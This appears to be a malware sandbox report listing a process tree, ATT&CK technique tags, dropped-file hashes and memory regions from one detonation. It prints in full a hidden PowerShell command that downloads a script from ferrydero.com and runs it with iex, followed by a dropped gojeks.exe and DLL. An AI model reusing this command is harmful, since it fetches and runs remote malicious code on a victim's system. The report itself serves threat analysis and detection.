  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
  2⤵
  PID:5200

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2652

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1112

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -command $uR='https://ferrydero.com/gopros/verify.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6076
- C:\ProgramData\Extracto\gojeks.exe
  "C:\ProgramData\Extracto\gojeks.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5480

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1600

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5032

C:\Windows\System32\hnaorh.exe
"C:\Windows\System32\hnaorh.exe"
1⤵
PID:5528

C:\Windows\System32\help.exe
"C:\Windows\System32\help.exe"
1⤵
PID:5620

C:\Windows\System32\help.exe
"C:\Windows\System32\help.exe"
1⤵
PID:4256

C:\Windows\System32\help.exe
"C:\Windows\System32\help.exe"
1⤵
PID:5772

C:\Windows\System32\help.exe
"C:\Windows\System32\help.exe"
1⤵
PID:1924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Extracto\gojeks.exe

Filesize
20KB

MD5
fa97a6f9d73a5df050e0db6acb82c478

SHA1
5776f50071359218699f90443a6dd51c31f5d639

SHA256
c7c7ced1b2fa62aa6c504b0ba04031dc804ee7a35b5d9a99df37fbf25a6cb86f

SHA512
68620298d6cec8e8d252963cfb65eaa4b78281d95b9f30a3a82756d83ee8c801794cdc39a12e2e68be60cc423db1b7ac57c1f2cfc5b02a8ca686bc634ef0d25e

Download Submit
C:\ProgramData\Extracto\wincr.dll

Filesize
683KB

MD5
e41e2b47fe05aa5155cb079c4118ccdc

SHA1
403b2653bfb04fa4bb151b10183e354e322b7b8e

SHA256
196696b311241febe7f706082bbce27ba0657c604f4fb54c83000d7454d537dd

SHA512
4ad49ee1a4a2b79e507f6bcfde9a525972c49523f2b17c8c98a8fcca1e47e05f3ea0c8d15038cf32f1e49cf639152cd2364c24e5c53eb1c8c366d830a67cee49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
bffcefacce25cd03f3d5c9446ddb903d

SHA1
8923f84aa86db316d2f5c122fe3874bbe26f3bab

SHA256
23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

SHA512
761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d22073dea53e79d9b824f27ac5e9813e

SHA1
6d8a7281241248431a1571e6ddc55798b01fa961

SHA256
86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

SHA512
97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1008B

MD5
59f665859090c342b14d4d88e67817e4

SHA1
fc4da6d24e62b16de587ab43232a6fac60d94f71

SHA256
4a30e21f61534ff9426b4658af11bfeb754468eca70f43be2d107bb128e15cfc

SHA512
d3802fc9e4e7f30d061fcda6db2fd04dff0e6731e5b5482a1142a3587e7ebf5ac9796445dedc08db2a510f5e52a933ae44eeb428c3baa121499a6dba1396c419

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
ee30e8f015d5d8d261f91092fbe0a92c

SHA1
f5bfd57f027b10fe328b0749043a4e734caf4689

SHA256
ad26e91dc62be7e12cede92df7e1cfb47ca141c0852f3ad5f4852579da768b87

SHA512
23749b1572c9f8e5b80950766c6005a868c84270ba09528acc80ed05cc0fd7dab64f5ddcf8d8ecfffb8d21d1545a20a4777e04c36b9f65c885cdcbfc17e39c18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
f85c17b7b66ebcc8a1d2d7a8b6adc440

SHA1
f164273555075bf19b5c638193adba8343b27448

SHA256
e11df0c5ce0d6c6370d5bb71b6df58768ff9d7a91f26283c71ee97e97cba6aaf

SHA512
546d4e85a0751f79486744f3be0a091c982acba4835ff58decc74f05e5f52880cc83d89b0d40456fb4a045ca3ce3ede7c294bcaf02c526522a321d75d4d59d5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
31c20f6a510764c569c008ccb2216027

SHA1
2f90f698edc19a6c143eafd949a111a5aae30e7c

SHA256
a539495cf74b161ead1d74ee502bd8efdc2f6e704e567405953bf7a73d4a6992

SHA512
f4a3cd4f9d71fa2ffaa1fbea0f870662dbff20393d668d229b8896457e4e272119c0c98fb173b8a49ae7081fa2d2e60bc40dc05a1eb9915c2b7ea44d560321bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e40e794cfa0ca5cd8f610d9e17734c6e

SHA1
d69a099676f05dfb7259ad965836bdb3a8caf2d7

SHA256
884c4f4c0ba4722a40d09cc7a6c8055cff079078490bba14209fc3f43bd0d4c7

SHA512
18e5c3011c7f8eaf3636daea6e30f93ba4d92dd010c3af5ce542f30045d981e22eec4e1a4f9e9ff588b15a1a51a961448d0e167dc8a0e224f29bcac9d02faa86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
b9b79a3e611751dbed0f8bae2433c8f7

SHA1
53c18dbce005ecdf7f87da7ede00d5ea8a6c2df4

SHA256
9bcc3936c0b1be2f04112f353e008640039b4b8100fab69b9e7d9cce91749aaa

SHA512
67f4db543ed873500a33a87493c7f507b9546d430c15ff668224ddb7ebfe44e019182b9a9b81ccfce08aa642d6793b79726eee8cf7e367bf7f802787379177cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
4ce61664719945fa8dcca6f0c14527d3

SHA1
0026cc724e7f211ba4a52c2a5602413c4d1934f4

SHA256
b83a81d98b8981b769fafde8a207e96eddc9e292827ed5a5c1784b0405e5e850

SHA512
0b46e4a9a3af81037d863814c6423c4ce702833f40ea286e720b6fdfcd6aa9f293bbf8cfbd71094153752ed0369ac7557cc3795aacc09e980e4aaa086492ff92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
cd1c96b6ad1b5abc54d71717a2603a91

SHA1
4f94d79eaa9d15613f521894b7934d260a7de591

SHA256
242cb7fc2e66e46a661216d6098ee6bf1d2e84ca4431b7fe846dc3009f2c80c1

SHA512
cc1f9b159989b738391a575070f82f5b648c8d7ecbab411ede0e4279eda4d888d55f20733d0a006e97e709581e1e05717e3746b0dc7280da04f92d4302b356ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
1fa6b7ce43b1f964896347385f4ffcb9

SHA1
23af278a0731eb3b24479adad838ab06b86d10e2

SHA256
509cc753d633e19e1b9374925b872980c74e42cdc8e6acb2b1a18b85ea43b6c0

SHA512
54e5eb0f2e48d175307efa25c0ee5b27780de19f44a2cb718c1e00a952bf610f835e6132db5c078cff0e05b370f8e32f845fddfaff77af08e70cca1309ded3be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7d93a1351c7d929df1862d5099d16ef4

SHA1
cef1af75a53a1a2066af1cd95020b5e4b4bb52ae

SHA256
678a1e75edc84f5df0a9865cd6ba43d55b8fd3ddd51916c105a0daf18c70d211

SHA512
4ed87f744121073d21a3f4e3e82c9f402c7e153556bcda921998925571ea723103d0517ac822769f52a6bac3c59b01b9f420f53b2989015520890ee48823a6a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c7bd8f9fcde7781f29eddef08b20b41e

SHA1
f2c54359295fb9296f3d69e12f978dd3eec26523

SHA256
e6ab7766d13cc4ba4b8f1269a6ccb4de22b194563ffcfa2cb34dde899f4ba2fe

SHA512
d70567025e6efb7597a55e1ae8bd079867a1440db29e07e7f04b82e63cfb500451f5660cba05823fe9477f1d9e339c9330aa005ba2779bf8ce0b0268bbfa11b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
13ea16c42024999d9308ac98897daac8

SHA1
b5a6ef701b69f3093787e1a89bf904660b772e7a

SHA256
9b273929fff162c196bb3cd108d567d6f9f2e6c785ba06e3fef3168771645c18

SHA512
f7f49a6983af3d9fdc185c0680c6859f14a3412c57b34b82782a796512d9aa2a65de07200562bc3b50a7e1e20402d1dac0762e44de5b0555c30e992c62eeb239

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5912d2.TMP

Filesize
48B

MD5
18043b9f8de8acded5e3492c543c79b5

SHA1
e1916c2b606215733608fc92767c7b0a93d63f22

SHA256
9ac5475e561743f37af82e89be8ca37c7f0c331b67ee6abc699063b2e45e4b1c

SHA512
d3e5a375ab4d20048fa42995c9151620bd0b95ad5eae641c354f4c74d6eee21a276631ce5dbab31ee5a882eb8edfcf44dbc9d58dc4dce1473992d33f09fde18c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
5f152379b52807989a5a14bdf1bd77cd

SHA1
acfd58648643bf158c9ca5fbb861d35f98fa9821

SHA256
d8327e676579f2bdc258757ba94cecf388bb23d034e2bc4ef7b1286767617993

SHA512
9b8027701bbf91227b6d78ce5983e4a392f7278aa427ed041fbc17129acb2eeae2eddec9f681613daf8c4a3661dcc03b5d27b3b250319586f492b79a535ac913

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
870B

MD5
033a87d71d674bd6a6811a9ff6c11fdf

SHA1
dea22ea8cc3b56b35d279c8c99cc1bd0f97556a5

SHA256
71ed08fd431040e8b24b9b1ad3b77698a5df6dfc7e162fce299061b5c24bf8b2

SHA512
55bfec7b06ae1f88da6e45ac1142375c78bb6b4543f9ecde645f260f8392637b326d6edeb7bf23ba5c94e8958d6a8cffbf37b1e80f1df184c0cada3303795573

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57f4d0.TMP

Filesize
370B

MD5
4be45e76a8baea801bfb6bd7045e9691

SHA1
89d78d82901c02faf5e0dd809a7d456c5bbaebcc

SHA256
6eb9b7e3ab24551ef23e02c051cd599f103037652efc8c3dbd1cfff2465de2f6

SHA512
0989bd0b2af7eb42ce330c278c396ca9a7c9f5cdac10574b3295b6e7a9683dbedaa7c95272258d884555cb11876685793264c98d89f49339875a111570693da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
362a4861ec7791d106d28f8330f62e6c

SHA1
c86a88091c4f889438d16f6d6cdc57a0c6f64464

SHA256
96a4480cf874e8a85e2a6e522b29bce785118f2ca19bc18848a9f4edb7c44c50

SHA512
d5b316fd2d468c2b90a54e407a54926be40b77024e581814652c3d87ac2456fe857e87675750b2e08dfdf546a3e47faeebd54214e11e9732b1eab484eff0dc84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
5c7d660009babfb1ac8c3ef8d464f38a

SHA1
8bb9bdf784871f14faa89d84c2989ac3bbfab910

SHA256
9879f7093cad395e911431a8be314f9723c8c588593b3dac5c82b2189934c3b6

SHA512
3eaf14753f4a59d59b72bc63725c5aa790dc4a540db31ccbe7a95ded56b8e733e7c99ab3171ebc5de543fc9020c2d764b6e1d9265decd46b52db7ca2d3bdd651

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
3b1a2487ecb323aea6bdea1c5e044d29

SHA1
a591da01ad7ece5eab8ab7d1b2e028c9c29c1bee

SHA256
d48155b518e2cfa9ba1182b9ee35e99f5bd5ba641b74cfda32c731f77a343132

SHA512
43d1eeb9e53ec5b015c9b6cfd5707a74ab3b497195473113287d77cf27bc0216f89a4f630e51998242ece0fdddd253ffe109d31147a4d47adcefc7b616d64906

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
ae6a93df8f0fd371a0d74ebf612bede2

SHA1
06d5ea0ba0390f77c6013203ba74e2e70403da4e

SHA256
0d075481cb4220641d3f2627eb6c80bd3962c681ba51af3214cbc7ac0b8c1746

SHA512
50092cab49961b821d925cddb26ae2ef187166d2cc81365f9b4a0b3f4a43fd741b101088b084bcab6753a1bb90a948ae3695758b2a063180511092a6bda6eafe

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eqcktvqe.pgu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1600-236-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/1600-235-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/1600-234-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/1600-233-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/1600-232-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/1600-237-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/1600-238-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/1600-226-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/1600-228-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/1600-227-0x0000020E321E0000-0x0000020E321E1000-memory.dmp

Filesize
4KB

Download
memory/5480-225-0x0000000075460000-0x0000000075512000-memory.dmp

Filesize
712KB

Download
memory/5480-224-0x0000000000560000-0x000000000056C000-memory.dmp

Filesize
48KB

Download
memory/5480-203-0x00000000011B0000-0x000000000120B000-memory.dmp

Filesize
364KB

Download
memory/5480-204-0x00000000011B0000-0x000000000120B000-memory.dmp

Filesize
364KB

Download
memory/6076-200-0x0000025E17C30000-0x0000025E186F1000-memory.dmp

Filesize
10.8MB

Download
memory/6076-184-0x0000025E31030000-0x0000025E3103A000-memory.dmp

Filesize
40KB

Download
memory/6076-183-0x0000025E310A0000-0x0000025E310B2000-memory.dmp

Filesize
72KB

Download
memory/6076-181-0x0000025E31610000-0x0000025E31DB6000-memory.dmp

Filesize
7.6MB

Download
memory/6076-179-0x0000025E30910000-0x0000025E30932000-memory.dmp

Filesize
136KB

Download